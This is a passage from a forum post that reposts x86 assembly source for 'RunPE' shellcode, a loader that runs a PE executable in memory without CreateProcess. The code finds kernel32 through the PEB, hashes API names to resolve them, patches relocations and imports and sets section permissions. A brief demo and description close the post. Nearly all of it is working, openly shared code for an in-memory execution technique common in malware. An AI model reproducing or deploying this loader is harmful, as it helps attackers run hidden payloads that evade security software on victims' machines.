stAPITable.pVirtualProtect_kernel32], eax, [edx + IMAGE_SECTION_HEADER.VirtualSize], [.section_flags], edi test eax, eax jz .Exit inc [.retval] .Exit: popad mov eax, [.retval] ret endp proc GetNtdll local iResult:DWORD push edi push esi push ebx push DWord [fs:0x30] pop edi mov esi, DWord [edi+0xC] push DWord [esi+0x1C] pop ebx push DWord [ebx+0x8] pop DWord [iResult] pop ebx pop esi pop edi mov eax, DWord [iResult] ret endp proc GetK32 local iResult:DWORD pusha mov ecx, DWord [fs:0x30] mov edi, DWord [ecx+0xC] mov edi, DWord [edi+0x1C] .NextModule: push DWord [edi+0x8] pop DWord [iResult] push DWord [edi+0x20] pop ebx mov edi, DWord [edi] movzx eax, Byte [ebx+0x18] test eax, eax jne .NextModule movzx eax, Byte [ebx] cmp eax, 0x4b je .Found_K32 cmp eax, 0x6b jne .NextModule .Found_K32: popa push DWord [iResult] pop eax ret endp proc GetHashSz strz push edx push ecx mov edx, DWord [strz] push DWORD 0x0 pop ecx push ecx .CalcHash: ror ecx, 7 xor [esp], ecx mov cl, Byte [edx] lea edx, [edx+0x1] test cl, cl jnz .CalcHash pop eax pop ecx pop edx ret endp proc AltGetProcAddressByHash hLib, fHashProc, iHashVal local iResult:DWORD pusha push DWORD 0x0 pop DWord [iResult] push DWord [hLib] pop esi movzx ecx, Word [esi] cmp ecx, 0x5a4d jne .End movzx edi, Word [esi+0x3c] add edi, esi cmp DWord [edi], DWORD 0x4550 jne .End push DWord [edi+0x78] pop ecx add ecx, esi mov ebx, DWord [ecx+0x18] push ecx push 0x0 pop edx push DWord [ecx+0x20] pop eax lea eax, [esi+eax] .MainLoop: push DWord [eax] pop edi add edi, esi push eax stdcall [fHashProc], edi cmp eax, DWord [iHashVal] pop eax jz .FoundProcname lea eax, [eax+0x4] lea edx, [edx+0x1] sub ebx, 0x1 or ebx, ebx jnz .MainLoop pop ecx jmp .End .FoundProcname: pop edi shl edx, 1 add edx, DWord [edi+0x24] movzx eax, Word [edx+esi] shl eax, 2 add eax, esi add eax, DWord [edi+0x1C] mov ebx, DWord [eax] lea ebx, [esi+ebx] push ebx pop DWord [iResult] .End: popa push DWord [iResult] pop eax ret endp xReloc = sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+0x8*IMAGE_DIRECTORY_ENTRY_BASERELOC proc reloc_fixup, dwImageBase:DWORD, pImageFileHeader:DWORD pusha mov edx, [dwImageBase] mov ebx, [pImageFileHeader] mov ebx, [ebx + sizeof.IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32.ImageBase] sub edx, ebx ; edx -> reloc_correction // delta_ImageBase je .end test ebx, ebx jz .end mov eax, [pImageFileHeader] mov ebx, [eax+xReloc] add ebx, [dwImageBase] .block: mov eax, [ebx + 04h] ; ImageBaseRelocation.SizeOfBlock test eax, eax jz .end lea ecx, [eax - 008h] shr ecx, 001h lea edi, [ebx + 008h] .do_entry: movzx eax, word [edi] ; Entry push edx mov edx, eax shr eax, 00Ch ; Type = Entry >> 12 mov esi, [dwImageBase] ; ImageBase and dx, 0FFFh add esi, [ebx] add esi, edx pop edx .HIGH: ; IMAGE_REL_BASED_HIGH dec eax jnz .LOW mov eax, edx shr eax, 010h ; HIWORD(Delta) jmp .LOW_fixup .LOW: ; IMAGE_REL_BASED_LOW dec eax jnz .HIGHLOW movzx eax, dx ; LOWORD(Delta) .LOW_fixup: add word [esi], ax ; mem[x] = mem[x] + delta_ImageBase jmp .next_entry .HIGHLOW: ; IMAGE_REL_BASED_HIGHLOW dec eax jnz .next_entry add [esi],edx ; mem[x] = mem[x] + delta_ImageBase .next_entry: inc edi inc edi ; Entry++ loop .do_entry .next_base: add ebx, [ebx + 004h] jmp .block .end: popa ret endp proc loadImportTable APITable:DWORD, pHashProc:DWORD, image_base:DWORD local .import_table:DWORD, .null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE, .retval:DWORD pushad xor eax, eax inc eax mov [.retval], eax mov edx, [image_base] mov eax, [edx + IMAGE_DOS_HEADER.e_lfanew] lea eax, [edx + eax + 4 + sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+sizeof.IMAGE_DATA_DIRECTORY] mov eax, [eax+IMAGE_DATA_DIRECTORY.VirtualAddress] add eax, edx mov [.import_table],eax lea edi, [.null_directory_entry] mov ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR mov al, 0h rep stosb mov ebx, [.import_table] .next_directory_entry: lea esi, [.null_directory_entry] mov edi, ebx mov ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR rep cmpsb je .exit_success stdcall loadImportDirectoryTable, [APITable], [pHashProc], [image_base], ebx test eax, eax jz .exit_error add ebx, sizeof.IMAGE_IMPORT_DESCRIPTOR jmp .next_directory_entry .exit_success: inc [.retval] .exit_error: popad mov eax, [.retval] ret endp proc loadImportDirectoryTable APITable:DWORD, pHashProc:DWORD, image_base:DWORD, directory_entry:DWORD local .lookup_table:DWORD, .import_address_table:DWORD, .dll_image_base:DWORD pushad mov eax, [directory_entry] mov eax, [eax+IMAGE_IMPORT_DESCRIPTOR.Name_] add eax, [image_base] ;load the corresponding dll mov ebx, [APITable] stdcall DWord [ebx+stAPITable.pLoadLibraryA_kernel32], eax test eax,eax jz .exit_error mov [.dll_image_base],eax mov edx, [directory_entry] mov eax, [edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk] add eax, [image_base] mov [.lookup_table], eax mov eax, [edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk] add eax, [image_base] mov [.import_address_table],eax xor ecx, ecx .next_lookup_entry: mov eax, [.lookup_table] add eax, ecx mov eax, [eax] test eax,eax jz .exit_success mov ebx, eax and eax, IMAGE_ORDINAL_FLAG32 jnz .exit_error .byname: add ebx, [image_base] lea ebx, [ebx+IMAGE_IMPORT_BY_NAME.Name_] mov eax, ebx push ecx stdcall GetHashSz, ebx stdcall AltGetProcAddressByHash, [.dll_image_base], [pHashProc], eax pop ecx test eax, eax jz .exit_error mov ebx, [.import_address_table] add ebx, ecx mov [ebx], eax add ecx, 4 jmp .next_lookup_entry .exit_success: popad mov eax,1 ret .exit_error: popad mov eax,0 ret endp dd _GetDeltaProc This shellcode can run pe in memory without CreateProcess API. EXE MUST have relocation table. It get only one parameter - pointer to PE Image For showing how it works I added simple demo. use32 format PE GUI 4.0 include 'win32a.inc' include 'pe.inc' entry start section '.code' code readable writeable executable RunPE: file 'RunPE.bin' start: stdcall RunPE, PEFILE PEFILE: file 'stored_exe.bin' Sursa: https://evilzone.org/code-library/%28asm-x86%29-runpe-shellcode/
×
×
  • Create New...